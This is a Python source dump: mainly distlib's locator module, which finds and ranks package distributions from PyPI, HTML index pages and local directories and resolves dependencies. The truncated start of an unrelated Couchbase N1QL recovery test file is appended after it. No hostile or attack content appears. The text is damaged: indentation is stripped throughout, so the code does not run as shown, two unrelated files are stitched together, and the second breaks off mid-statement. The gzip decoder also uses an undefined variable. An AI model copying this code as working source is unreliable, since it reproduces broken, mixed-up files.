HTML_CONTENT_TYPE = re.compile('text/html|application/x(ht)?ml')
DEFAULT_INDEX = 'https://pypi.python.org/pypi'
def get_all_distribution_names(url=None):
"""
Return all distribution names known by an index.
:param url: The URL of the index.
:return: A list of all known distribution names.
"""
if url is None:
url = DEFAULT_INDEX
client = ServerProxy(url, timeout=3.0)
return client.list_packages()
class RedirectHandler(BaseRedirectHandler):
"""
A class to work around a bug in some Python 3.2.x releases.
"""
# There's a bug in the base version for some 3.2.x
# (e.g. 3.2.2 on Ubuntu Oneiric). If a Location header
# returns e.g. /abc, it bails because it says the scheme ''
# is bogus, when actually it should use the request's
# URL for the scheme. See Python issue #13696.
def http_error_302(self, req, fp, code, msg, headers):
# Some servers (incorrectly) return multiple Location headers
# (so probably same goes for URI). Use first header.
newurl = None
for key in ('location', 'uri'):
if key in headers:
newurl = headers[key]
break
if newurl is None:
return
urlparts = urlparse(newurl)
if urlparts.scheme == '':
newurl = urljoin(req.get_full_url(), newurl)
if hasattr(headers, 'replace_header'):
headers.replace_header(key, newurl)
else:
headers[key] = newurl
return BaseRedirectHandler.http_error_302(self, req, fp, code, msg,
headers)
http_error_301 = http_error_303 = http_error_307 = http_error_302
class Locator(object):
"""
A base class for locators - things that locate distributions.
"""
source_extensions = ('.tar.gz', '.tar.bz2', '.tar', '.zip', '.tgz', '.tbz')
binary_extensions = ('.egg', '.exe', '.whl')
excluded_extensions = ('.pdf',)
# A list of tags indicating which wheels you want to match. The default
# value of None matches against the tags compatible with the running
# Python. If you want to match other values, set wheel_tags on a locator
# instance to a list of tuples (pyver, abi, arch) which you want to match.
wheel_tags = None
downloadable_extensions = source_extensions + ('.whl',)
def __init__(self, scheme='default'):
"""
Initialise an instance.
:param scheme: Because locators look for most recent versions, they
need to know the version scheme to use. This specifies
the current PEP-recommended scheme - use ``'legacy'``
if you need to support existing distributions on PyPI.
"""
self._cache = {}
self.scheme = scheme
# Because of bugs in some of the handlers on some of the platforms,
# we use our own opener rather than just using urlopen.
self.opener = build_opener(RedirectHandler())
# If get_project() is called from locate(), the matcher instance
# is set from the requirement passed to locate(). See issue #18 for
# why this can be useful to know.
self.matcher = None
self.errors = queue.Queue()
def get_errors(self):
"""
Return any errors which have occurred.
"""
result = []
while not self.errors.empty(): # pragma: no cover
try:
e = self.errors.get(False)
result.append(e)
except self.errors.Empty:
continue
self.errors.task_done()
return result
def clear_errors(self):
"""
Clear any errors which may have been logged.
"""
# Just get the errors and throw them away
self.get_errors()
def clear_cache(self):
self._cache.clear()
def _get_scheme(self):
return self._scheme
def _set_scheme(self, value):
self._scheme = value
scheme = property(_get_scheme, _set_scheme)
def _get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This should be implemented in subclasses.
If called from a locate() request, self.matcher will be set to a
matcher for the requirement to satisfy, otherwise it will be None.
"""
raise NotImplementedError('Please implement in the subclass')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Please implement in the subclass')
def get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This calls _get_project to do all the work, and just implements a caching layer on top.
"""
if self._cache is None:
result = self._get_project(name)
elif name in self._cache:
result = self._cache[name]
else:
self.clear_errors()
result = self._get_project(name)
self._cache[name] = result
return result
def score_url(self, url):
"""
Give an url a score which can be used to choose preferred URLs
for a given project release.
"""
t = urlparse(url)
basename = posixpath.basename(t.path)
compatible = True
is_wheel = basename.endswith('.whl')
if is_wheel:
compatible = is_compatible(Wheel(basename), self.wheel_tags)
return (t.scheme != 'https', 'pypi.python.org' in t.netloc,
is_wheel, compatible, basename)
def prefer_url(self, url1, url2):
"""
Choose one of two URLs where both are candidates for distribution
archives for the same version of a distribution (for example,
.tar.gz vs. zip).
The current implementation favours https:// URLs over http://, archives
from PyPI over those from other locations, wheel compatibility (if a
wheel) and then the archive name.
"""
result = url2
if url1:
s1 = self.score_url(url1)
s2 = self.score_url(url2)
if s1 > s2:
result = url1
if result != url2:
logger.debug('Not replacing %r with %r', url1, url2)
else:
logger.debug('Replacing %r with %r', url1, url2)
return result
def split_filename(self, filename, project_name):
"""
Attempt to split a filename in project name, version and Python version.
"""
return split_filename(filename, project_name)
def convert_url_to_download_info(self, url, project_name):
"""
See if a URL is a candidate for a download URL for a project (the URL
has typically been scraped from an HTML page).
If it is, a dictionary is returned with keys "name", "version",
"filename" and "url"; otherwise, None is returned.
"""
def same_project(name1, name2):
return normalize_name(name1) == normalize_name(name2)
result = None
scheme, netloc, path, params, query, frag = urlparse(url)
if frag.lower().startswith('egg='):
logger.debug('%s: version hint in fragment: %r',
project_name, frag)
m = HASHER_HASH.match(frag)
if m:
algo, digest = m.groups()
else:
algo, digest = None, None
origpath = path
if path and path[-1] == '/':
path = path[:-1]
if path.endswith('.whl'):
try:
wheel = Wheel(path)
if is_compatible(wheel, self.wheel_tags):
if project_name is None:
include = True
else:
include = same_project(wheel.name, project_name)
if include:
result = {
'name': wheel.name,
'version': wheel.version,
'filename': wheel.filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
'python-version': ', '.join(
['.'.join(list(v[2:])) for v in wheel.pyver]),
}
except Exception as e: # pragma: no cover
logger.warning('invalid path for wheel: %s', path)
elif path.endswith(self.downloadable_extensions):
path = filename = posixpath.basename(path)
for ext in self.downloadable_extensions:
if path.endswith(ext):
path = path[:-len(ext)]
t = self.split_filename(path, project_name)
if not t:
logger.debug('No match for project/version: %s', path)
else:
name, version, pyver = t
if not project_name or same_project(project_name, name):
result = {
'name': name,
'version': version,
'filename': filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
#'packagetype': 'sdist',
}
if pyver:
result['python-version'] = pyver
break
if result and algo:
result['%s_digest' % algo] = digest
return result
def _get_digest(self, info):
"""
Get a digest from a dictionary by looking at keys of the form
'algo_digest'.
Returns a 2-tuple (algo, digest) if found, else None. Currently
looks only for SHA256, then MD5.
"""
result = None
for algo in ('sha256', 'md5'):
key = '%s_digest' % algo
if key in info:
result = (algo, info[key])
break
return result
def _update_version_data(self, result, info):
"""
Update a result dictionary (the final result from _get_project) with a
dictionary for a specific version, which typically holds information
gleaned from a filename or URL for an archive for the distribution.
"""
name = info.pop('name')
version = info.pop('version')
if version in result:
dist = result[version]
md = dist.metadata
else:
dist = make_dist(name, version, scheme=self.scheme)
md = dist.metadata
dist.digest = digest = self._get_digest(info)
url = info['url']
result['digests'][url] = digest
if md.source_url != info['url']:
md.source_url = self.prefer_url(md.source_url, url)
result['urls'].setdefault(version, set()).add(url)
dist.locator = self
result[version] = dist
def locate(self, requirement, prereleases=False):
"""
Find the most recent distribution which matches the given
requirement.
:param requirement: A requirement of the form 'foo (1.0)' or perhaps
'foo (>= 1.0, < 2.0, != 1.3)'
:param prereleases: If ``True``, allow pre-release versions
to be located. Otherwise, pre-release versions
are not returned.
:return: A :class:`Distribution` instance, or ``None`` if no such
distribution could be located.
"""
result = None
r = parse_requirement(requirement)
if r is None:
raise DistlibException('Not a valid requirement: %r' % requirement)
scheme = get_scheme(self.scheme)
self.matcher = matcher = scheme.matcher(r.requirement)
logger.debug('matcher: %s (%s)', matcher, type(matcher).__name__)
versions = self.get_project(r.name)
if len(versions) > 2: # urls and digests keys are present
# sometimes, versions are invalid
slist = []
vcls = matcher.version_class
for k in versions:
if k in ('urls', 'digests'):
continue
try:
if not matcher.match(k):
logger.debug('%s did not match %r', matcher, k)
else:
if prereleases or not vcls(k).is_prerelease:
slist.append(k)
else:
logger.debug('skipping pre-release '
'version %s of %s', k, matcher.name)
except Exception: # pragma: no cover
logger.warning('error matching %s with %r', matcher, k)
pass # slist.append(k)
if len(slist) > 1:
slist = sorted(slist, key=scheme.key)
if slist:
logger.debug('sorted list: %s', slist)
version = slist[-1]
result = versions[version]
if result:
if r.extras:
result.extras = r.extras
result.download_urls = versions.get('urls', {}).get(version, set())
d = {}
sd = versions.get('digests', {})
for url in result.download_urls:
if url in sd:
d[url] = sd[url]
result.digests = d
self.matcher = None
return result
class PyPIRPCLocator(Locator):
"""
This locator uses XML-RPC to locate distributions. It therefore
cannot be used with simple mirrors (that only mirror file content).
"""
def __init__(self, url, **kwargs):
"""
Initialise an instance.
:param url: The URL to use for XML-RPC.
:param kwargs: Passed to the superclass constructor.
"""
super(PyPIRPCLocator, self).__init__(**kwargs)
self.base_url = url
self.client = ServerProxy(url, timeout=3.0)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
return set(self.client.list_packages())
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
versions = self.client.package_releases(name, True)
for v in versions:
urls = self.client.release_urls(name, v)
data = self.client.release_data(name, v)
metadata = Metadata(scheme=self.scheme)
metadata.name = data['name']
metadata.version = data['version']
metadata.license = data.get('license')
metadata.keywords = data.get('keywords', [])
metadata.summary = data.get('summary')
dist = Distribution(metadata)
if urls:
info = urls[0]
metadata.source_url = info['url']
dist.digest = self._get_digest(info)
dist.locator = self
result[v] = dist
for info in urls:
url = info['url']
digest = self._get_digest(info)
result['urls'].setdefault(v, set()).add(url)
result['digests'][url] = digest
return result
class PyPIJSONLocator(Locator):
"""
This locator uses PyPI's JSON interface. It's very limited in functionality
and probably not worth using.
"""
def __init__(self, url, **kwargs):
super(PyPIJSONLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
url = urljoin(self.base_url, '%s/json' % quote(name))
try:
resp = self.opener.open(url)
data = resp.read().decode() # for now
d = json.loads(data)
md = Metadata(scheme=self.scheme)
data = d['info']
md.name = data['name']
md.version = data['version']
md.license = data.get('license')
md.keywords = data.get('keywords', [])
md.summary = data.get('summary')
dist = Distribution(md)
dist.locator = self
urls = d['urls']
result[md.version] = dist
for info in d['urls']:
url = info['url']
dist.download_urls.add(url)
dist.digests[url] = self._get_digest(info)
result['urls'].setdefault(md.version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# Now get other releases
for version, infos in d['releases'].items():
if version == md.version:
continue # already done
omd = Metadata(scheme=self.scheme)
omd.name = md.name
omd.version = version
odist = Distribution(omd)
odist.locator = self
result[version] = odist
for info in infos:
url = info['url']
odist.download_urls.add(url)
odist.digests[url] = self._get_digest(info)
result['urls'].setdefault(version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# for info in urls:
# md.source_url = info['url']
# dist.digest = self._get_digest(info)
# dist.locator = self
# for info in urls:
# url = info['url']
# result['urls'].setdefault(md.version, set()).add(url)
# result['digests'][url] = self._get_digest(info)
except Exception as e:
self.errors.put(text_type(e))
logger.exception('JSON fetch failed: %s', e)
return result
class Page(object):
"""
This class represents a scraped HTML page.
"""
# The following slightly hairy-looking regex just looks for the contents of
# an anchor link, which has an attribute "href" either immediately preceded
# or immediately followed by a "rel" attribute. The attribute values can be
# declared with double quotes, single quotes or no quotes - which leads to
# the length of the expression.
_href = re.compile("""
(rel\s*=\s*(?:"(?P<rel1>[^"]*)"|'(?P<rel2>[^']*)'|(?P<rel3>[^>\s\n]*))\s+)?
href\s*=\s*(?:"(?P<url1>[^"]*)"|'(?P<url2>[^']*)'|(?P<url3>[^>\s\n]*))
(\s+rel\s*=\s*(?:"(?P<rel4>[^"]*)"|'(?P<rel5>[^']*)'|(?P<rel6>[^>\s\n]*)))?
""", re.I | re.S | re.X)
_base = re.compile(r"""<base\s+href\s*=\s*['"]?([^'">]+)""", re.I | re.S)
def __init__(self, data, url):
"""
Initialise an instance with the Unicode page contents and the URL they
came from.
"""
self.data = data
self.base_url = self.url = url
m = self._base.search(self.data)
if m:
self.base_url = m.group(1)
_clean_re = re.compile(r'[^a-z0-9$&+,/:;=?@.#%_\\|-]', re.I)
@cached_property
def links(self):
"""
Return the URLs of all the links on a page together with information
about their "rel" attribute, for determining which ones to treat as
downloads and which ones to queue for further scraping.
"""
def clean(url):
"Tidy up an URL."
scheme, netloc, path, params, query, frag = urlparse(url)
return urlunparse((scheme, netloc, quote(path),
params, query, frag))
result = set()
for match in self._href.finditer(self.data):
d = match.groupdict('')
rel = (d['rel1'] or d['rel2'] or d['rel3'] or
d['rel4'] or d['rel5'] or d['rel6'])
url = d['url1'] or d['url2'] or d['url3']
url = urljoin(self.base_url, url)
url = unescape(url)
url = self._clean_re.sub(lambda m: '%%%2x' % ord(m.group(0)), url)
result.add((url, rel))
# We sort the result, hoping to bring the most recent versions
# to the front
result = sorted(result, key=lambda t: t[0], reverse=True)
return result
class SimpleScrapingLocator(Locator):
"""
A locator which scrapes HTML pages to locate downloads for a distribution.
This runs multiple threads to do the I/O; performance is at least as good
as pip's PackageFinder, which works in an analogous fashion.
"""
# These are used to deal with various Content-Encoding schemes.
decoders = {
'deflate': zlib.decompress,
'gzip': lambda b: gzip.GzipFile(fileobj=BytesIO(d)).read(),
'none': lambda b: b,
}
def __init__(self, url, timeout=None, num_workers=10, **kwargs):
"""
Initialise an instance.
:param url: The root URL to use for scraping.
:param timeout: The timeout, in seconds, to be applied to requests.
This defaults to ``None`` (no timeout specified).
:param num_workers: The number of worker threads you want to do I/O,
This defaults to 10.
:param kwargs: Passed to the superclass.
"""
super(SimpleScrapingLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
self.timeout = timeout
self._page_cache = {}
self._seen = set()
self._to_fetch = queue.Queue()
self._bad_hosts = set()
self.skip_externals = False
self.num_workers = num_workers
self._lock = threading.RLock()
# See issue #45: we need to be resilient when the locator is used
# in a thread, e.g. with concurrent.futures. We can't use self._lock
# as it is for coordinating our internal threads - the ones created
# in _prepare_threads.
self._gplock = threading.RLock()
def _prepare_threads(self):
"""
Threads are created only when get_project is called, and terminate
before it returns. They are there primarily to parallelise I/O (i.e.
fetching web pages).
"""
self._threads = []
for i in range(self.num_workers):
t = threading.Thread(target=self._fetch)
t.setDaemon(True)
t.start()
self._threads.append(t)
def _wait_threads(self):
"""
Tell all the threads to terminate (by sending a sentinel value) and
wait for them to do so.
"""
# Note that you need two loops, since you can't say which
# thread will get each sentinel
for t in self._threads:
self._to_fetch.put(None) # sentinel
for t in self._threads:
t.join()
self._threads = []
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
with self._gplock:
self.result = result
self.project_name = name
url = urljoin(self.base_url, '%s/' % quote(name))
self._seen.clear()
self._page_cache.clear()
self._prepare_threads()
try:
logger.debug('Queueing %s', url)
self._to_fetch.put(url)
self._to_fetch.join()
finally:
self._wait_threads()
del self.result
return result
platform_dependent = re.compile(r'\b(linux-(i\d86|x86_64|arm\w+)|'
r'win(32|-amd64)|macosx-?\d+)\b', re.I)
def _is_platform_dependent(self, url):
"""
Does an URL refer to a platform-specific download?
"""
return self.platform_dependent.search(url)
def _process_download(self, url):
"""
See if an URL is a suitable download for a project.
If it is, register information in the result dictionary (for
_get_project) about the specific version it's for.
Note that the return value isn't actually used other than as a boolean
value.
"""
if self._is_platform_dependent(url):
info = None
else:
info = self.convert_url_to_download_info(url, self.project_name)
logger.debug('process_download: %s -> %s', url, info)
if info:
with self._lock: # needed because self.result is shared
self._update_version_data(self.result, info)
return info
def _should_queue(self, link, referrer, rel):
"""
Determine whether a link URL from a referring page and with a
particular "rel" attribute should be queued for scraping.
"""
scheme, netloc, path, _, _, _ = urlparse(link)
if path.endswith(self.source_extensions + self.binary_extensions +
self.excluded_extensions):
result = False
elif self.skip_externals and not link.startswith(self.base_url):
result = False
elif not referrer.startswith(self.base_url):
result = False
elif rel not in ('homepage', 'download'):
result = False
elif scheme not in ('http', 'https', 'ftp'):
result = False
elif self._is_platform_dependent(link):
result = False
else:
host = netloc.split(':', 1)[0]
if host.lower() == 'localhost':
result = False
else:
result = True
logger.debug('should_queue: %s (%s) from %s -> %s', link, rel,
referrer, result)
return result
def _fetch(self):
"""
Get a URL to fetch from the work queue, get the HTML page, examine its
links for download candidates and candidates for further scraping.
This is a handy method to run in a thread.
"""
while True:
url = self._to_fetch.get()
try:
if url:
page = self.get_page(url)
if page is None: # e.g. after an error
continue
for link, rel in page.links:
if link not in self._seen:
self._seen.add(link)
if (not self._process_download(link) and
self._should_queue(link, url, rel)):
logger.debug('Queueing %s from %s', link, url)
self._to_fetch.put(link)
except Exception as e: # pragma: no cover
self.errors.put(text_type(e))
finally:
# always do this, to avoid hangs :-)
self._to_fetch.task_done()
if not url:
#logger.debug('Sentinel seen, quitting.')
break
def get_page(self, url):
"""
Get the HTML for an URL, possibly from an in-memory cache.
XXX TODO Note: this cache is never actually cleared. It's assumed that
the data won't get stale over the lifetime of a locator instance (not
necessarily true for the default_locator).
"""
# http://peak.telecommunity.com/DevCenter/EasyInstall#package-index-api
scheme, netloc, path, _, _, _ = urlparse(url)
if scheme == 'file' and os.path.isdir(url2pathname(path)):
url = urljoin(ensure_slash(url), 'index.html')
if url in self._page_cache:
result = self._page_cache[url]
logger.debug('Returning %s from cache: %s', url, result)
else:
host = netloc.split(':', 1)[0]
result = None
if host in self._bad_hosts:
logger.debug('Skipping %s due to bad host %s', url, host)
else:
req = Request(url, headers={'Accept-encoding': 'identity'})
try:
logger.debug('Fetching %s', url)
resp = self.opener.open(req, timeout=self.timeout)
logger.debug('Fetched %s', url)
headers = resp.info()
content_type = headers.get('Content-Type', '')
if HTML_CONTENT_TYPE.match(content_type):
final_url = resp.geturl()
data = resp.read()
encoding = headers.get('Content-Encoding')
if encoding:
decoder = self.decoders[encoding] # fail if not found
data = decoder(data)
encoding = 'utf-8'
m = CHARSET.search(content_type)
if m:
encoding = m.group(1)
try:
data = data.decode(encoding)
except UnicodeError: # pragma: no cover
data = data.decode('latin-1') # fallback
result = Page(data, final_url)
self._page_cache[final_url] = result
except HTTPError as e:
if e.code != 404:
logger.exception('Fetch failed: %s: %s', url, e)
except URLError as e: # pragma: no cover
logger.exception('Fetch failed: %s: %s', url, e)
with self._lock:
self._bad_hosts.add(host)
except Exception as e: # pragma: no cover
logger.exception('Fetch failed: %s: %s', url, e)
finally:
self._page_cache[url] = result # even if None (failure)
return result
_distname_re = re.compile('<a href=[^>]*>([^<]+)<')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
page = self.get_page(self.base_url)
if not page:
raise DistlibException('Unable to get %s' % self.base_url)
for match in self._distname_re.finditer(page.data):
result.add(match.group(1))
return result
class DirectoryLocator(Locator):
"""
This class locates distributions in a directory tree.
"""
def __init__(self, path, **kwargs):
"""
Initialise an instance.
:param path: The root of the directory tree to search.
:param kwargs: Passed to the superclass constructor,
except for:
* recursive - if True (the default), subdirectories are
recursed into. If False, only the top-level directory
is searched,
"""
self.recursive = kwargs.pop('recursive', True)
super(DirectoryLocator, self).__init__(**kwargs)
path = os.path.abspath(path)
if not os.path.isdir(path): # pragma: no cover
raise DistlibException('Not a directory: %r' % path)
self.base_dir = path
def should_include(self, filename, parent):
"""
Should a filename be considered as a candidate for a distribution
archive? As well as the filename, the directory which contains it
is provided, though not used by the current implementation.
"""
return filename.endswith(self.downloadable_extensions)
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, name)
if info:
self._update_version_data(result, info)
if not self.recursive:
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, None)
if info:
result.add(info['name'])
if not self.recursive:
break
return result
class JSONLocator(Locator):
"""
This locator uses special extended metadata (not available on PyPI) and is
the basis of performant dependency resolution in distlib. Other locators
require archive downloads before dependencies can be determined! As you
might imagine, that can be slow.
"""
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
data = get_project_data(name)
if data:
for info in data.get('files', []):
if info['ptype'] != 'sdist' or info['pyversion'] != 'source':
continue
# We don't store summary in project metadata as it makes
# the data bigger for no benefit during dependency
# resolution
dist = make_dist(data['name'], info['version'],
summary=data.get('summary',
'Placeholder for summary'),
scheme=self.scheme)
md = dist.metadata
md.source_url = info['url']
# TODO SHA256 digest
if 'digest' in info and info['digest']:
dist.digest = ('md5', info['digest'])
md.dependencies = info.get('requirements', {})
dist.exports = info.get('exports', {})
result[dist.version] = dist
result['urls'].setdefault(dist.version, set()).add(info['url'])
return result
class DistPathLocator(Locator):
"""
This locator finds installed distributions in a path. It can be useful for
adding to an :class:`AggregatingLocator`.
"""
def __init__(self, distpath, **kwargs):
"""
Initialise an instance.
:param distpath: A :class:`DistributionPath` instance to search.
"""
super(DistPathLocator, self).__init__(**kwargs)
assert isinstance(distpath, DistributionPath)
self.distpath = distpath
def _get_project(self, name):
dist = self.distpath.get_distribution(name)
if dist is None:
result = {'urls': {}, 'digests': {}}
else:
result = {
dist.version: dist,
'urls': {dist.version: set([dist.source_url])},
'digests': {dist.version: set([None])}
}
return result
class AggregatingLocator(Locator):
"""
This class allows you to chain and/or merge a list of locators.
"""
def __init__(self, *locators, **kwargs):
"""
Initialise an instance.
:param locators: The list of locators to search.
:param kwargs: Passed to the superclass constructor,
except for:
* merge - if False (the default), the first successful
search from any of the locators is returned. If True,
the results from all locators are merged (this can be
slow).
"""
self.merge = kwargs.pop('merge', False)
self.locators = locators
super(AggregatingLocator, self).__init__(**kwargs)
def clear_cache(self):
super(AggregatingLocator, self).clear_cache()
for locator in self.locators:
locator.clear_cache()
def _set_scheme(self, value):
self._scheme = value
for locator in self.locators:
locator.scheme = value
scheme = property(Locator.scheme.fget, _set_scheme)
def _get_project(self, name):
result = {}
for locator in self.locators:
d = locator.get_project(name)
if d:
if self.merge:
files = result.get('urls', {})
digests = result.get('digests', {})
# next line could overwrite result['urls'], result['digests']
result.update(d)
df = result.get('urls')
if files and df:
for k, v in files.items():
if k in df:
df[k] |= v
else:
df[k] = v
dd = result.get('digests')
if digests and dd:
dd.update(digests)
else:
# See issue #18. If any dists are found and we're looking
# for specific constraints, we only return something if
# a match is found. For example, if a DirectoryLocator
# returns just foo (1.0) while we're looking for
# foo (>= 2.0), we'll pretend there was nothing there so
# that subsequent locators can be queried. Otherwise we
# would just return foo (1.0) which would then lead to a
# failure to find foo (>= 2.0), because other locators
# weren't searched. Note that this only matters when
# merge=False.
if self.matcher is None:
found = True
else:
found = False
for k in d:
if self.matcher.match(k):
found = True
break
if found:
result = d
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for locator in self.locators:
try:
result |= locator.get_distribution_names()
except NotImplementedError:
pass
return result
# We use a legacy scheme simply because most of the dists on PyPI use legacy
# versions which don't conform to PEP 426 / PEP 440.
default_locator = AggregatingLocator(
JSONLocator(),
SimpleScrapingLocator('https://pypi.python.org/simple/',
timeout=3.0),
scheme='legacy')
locate = default_locator.locate
NAME_VERSION_RE = re.compile(r'(?P<name>[\w-]+)\s*'
r'\(\s*(==\s*)?(?P<ver>[^)]+)\)$')
class DependencyFinder(object):
"""
Locate dependencies for distributions.
"""
def __init__(self, locator=None):
"""
Initialise an instance, using the specified locator
to locate distributions.
"""
self.locator = locator or default_locator
self.scheme = get_scheme(self.locator.scheme)
def add_distribution(self, dist):
"""
Add a distribution to the finder. This will update internal information
about who provides what.
:param dist: The distribution to add.
"""
logger.debug('adding distribution %s', dist)
name = dist.key
self.dists_by_name[name] = dist
self.dists[(name, dist.version)] = dist
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Add to provided: %s, %s, %s', name, version, dist)
self.provided.setdefault(name, set()).add((version, dist))
def remove_distribution(self, dist):
"""
Remove a distribution from the finder. This will update internal
information about who provides what.
:param dist: The distribution to remove.
"""
logger.debug('removing distribution %s', dist)
name = dist.key
del self.dists_by_name[name]
del self.dists[(name, dist.version)]
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Remove from provided: %s, %s, %s', name, version, dist)
s = self.provided[name]
s.remove((version, dist))
if not s:
del self.provided[name]
def get_matcher(self, reqt):
"""
Get a version matcher for a requirement.
:param reqt: The requirement
:type reqt: str
:return: A version matcher (an instance of
:class:`distlib.version.Matcher`).
"""
try:
matcher = self.scheme.matcher(reqt)
except UnsupportedVersionError: # pragma: no cover
# XXX compat-mode if cannot read the version
name = reqt.split()[0]
matcher = self.scheme.matcher(name)
return matcher
def find_providers(self, reqt):
"""
Find the distributions which can fulfill a requirement.
:param reqt: The requirement.
:type reqt: str
:return: A set of distribution which can fulfill the requirement.
"""
matcher = self.get_matcher(reqt)
name = matcher.key # case-insensitive
result = set()
provided = self.provided
if name in provided:
for version, provider in provided[name]:
try:
match = matcher.match(version)
except UnsupportedVersionError:
match = False
if match:
result.add(provider)
break
return result
def try_to_replace(self, provider, other, problems):
"""
Attempt to replace one provider with another. This is typically used
when resolving dependencies from multiple sources, e.g. A requires
(B >= 1.0) while C requires (B >= 1.1).
For successful replacement, ``provider`` must meet all the requirements
which ``other`` fulfills.
:param provider: The provider we are trying to replace with.
:param other: The provider we're trying to replace.
:param problems: If False is returned, this will contain what
problems prevented replacement. This is currently
a tuple of the literal string 'cantreplace',
``provider``, ``other`` and the set of requirements
that ``provider`` couldn't fulfill.
:return: True if we can replace ``other`` with ``provider``, else
False.
"""
rlist = self.reqts[other]
unmatched = set()
for s in rlist:
matcher = self.get_matcher(s)
if not matcher.match(provider.version):
unmatched.add(s)
if unmatched:
# can't replace other with provider
problems.add(('cantreplace', provider, other,
frozenset(unmatched)))
result = False
else:
# can replace other with provider
self.remove_distribution(other)
del self.reqts[other]
for s in rlist:
self.reqts.setdefault(provider, set()).add(s)
self.add_distribution(provider)
result = True
return result
def find(self, requirement, meta_extras=None, prereleases=False):
"""
Find a distribution and all distributions it depends on.
:param requirement: The requirement specifying the distribution to
find, or a Distribution instance.
:param meta_extras: A list of meta extras such as :test:, :build: and
so on.
:param prereleases: If ``True``, allow pre-release versions to be
returned - otherwise, don't return prereleases
unless they're all that's available.
Return a set of :class:`Distribution` instances and a set of
problems.
The distributions returned should be such that they have the
:attr:`required` attribute set to ``True`` if they were
from the ``requirement`` passed to ``find()``, and they have the
:attr:`build_time_dependency` attribute set to ``True`` unless they
are post-installation dependencies of the ``requirement``.
The problems should be a tuple consisting of the string
``'unsatisfied'`` and the requirement which couldn't be satisfied
by any distribution known to the locator.
"""
self.provided = {}
self.dists = {}
self.dists_by_name = {}
self.reqts = {}
meta_extras = set(meta_extras or [])
if ':*:' in meta_extras:
meta_extras.remove(':*:')
# :meta: and :run: are implicitly included
meta_extras |= set([':test:', ':build:', ':dev:'])
if isinstance(requirement, Distribution):
dist = odist = requirement
logger.debug('passed %s as requirement', odist)
else:
dist = odist = self.locator.locate(requirement,
prereleases=prereleases)
if dist is None:
raise DistlibException('Unable to locate %r' % requirement)
logger.debug('located %s', odist)
dist.requested = True
problems = set()
todo = set([dist])
install_dists = set([odist])
while todo:
dist = todo.pop()
name = dist.key # case-insensitive
if name not in self.dists_by_name:
self.add_distribution(dist)
else:
#import pdb; pdb.set_trace()
other = self.dists_by_name[name]
if other != dist:
self.try_to_replace(dist, other, problems)
ireqts = dist.run_requires | dist.meta_requires
sreqts = dist.build_requires
ereqts = set()
if dist in install_dists:
for key in ('test', 'build', 'dev'):
e = ':%s:' % key
if e in meta_extras:
ereqts |= getattr(dist, '%s_requires' % key)
all_reqts = ireqts | sreqts | ereqts
for r in all_reqts:
providers = self.find_providers(r)
if not providers:
logger.debug('No providers found for %r', r)
provider = self.locator.locate(r, prereleases=prereleases)
# If no provider is found and we didn't consider
# prereleases, consider them now.
if provider is None and not prereleases:
provider = self.locator.locate(r, prereleases=True)
if provider is None:
logger.debug('Cannot satisfy %r', r)
problems.add(('unsatisfied', r))
else:
n, v = provider.key, provider.version
if (n, v) not in self.dists:
todo.add(provider)
providers.add(provider)
if r in ireqts and dist in install_dists:
install_dists.add(provider)
logger.debug('Adding %s to install_dists',
provider.name_and_version)
for p in providers:
name = p.key
if name not in self.dists_by_name:
self.reqts.setdefault(p, set()).add(r)
else:
other = self.dists_by_name[name]
if other != p:
# see if other can be replaced by p
self.try_to_replace(p, other, problems)
dists = set(self.dists.values())
for dist in dists:
dist.build_time_dependency = dist not in install_dists
if dist.build_time_dependency:
logger.debug('%s is a build-time dependency only.',
dist.name_and_version)
logger.debug('find done for %s', odist)
return dists, problems
|
n1ql_aggregate_pushdown_recovery.py
|
import itertools
import logging
import threading
from couchbase_helper.tuq_helper import N1QLHelper
from membase.api.rest_client import RestConnection
from remote.remote_util import RemoteMachineShellConnection
from tuq import QueryTests
log = logging.getLogger(__name__)
AGGREGATE_FUNCTIONS = ["SUM", "MIN", "MAX", "COUNT", "COUNTN", "AVG"]
DISTINCT_AGGREGATE_FUNCTIONS = ["SUM", "COUNT", "AVG"]
class AggregatePushdownRecoveryClass(QueryTests):
def setUp(self):
super(AggregatePushdownRecoveryClass, self).setUp()
self.n1ql_helper = N1QLHelper(master=self.master)
self.n1ql_node = self.get_nodes_from_services_map(service_type="n1ql")
self.aggr_distinct = self.input.param("aggr_distinct", False)
self.graceful = self.input.param("graceful", False)
def tearDown(self):
super(AggregatePushdownRecoveryClass, self).tearDown()
def test_indexer_rebalance_in(self):
self.find_nodes_in_list()
index_names_defn = self._create_array_index_definitions()
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], self.nodes_in_list,
[], services=self.services_in)
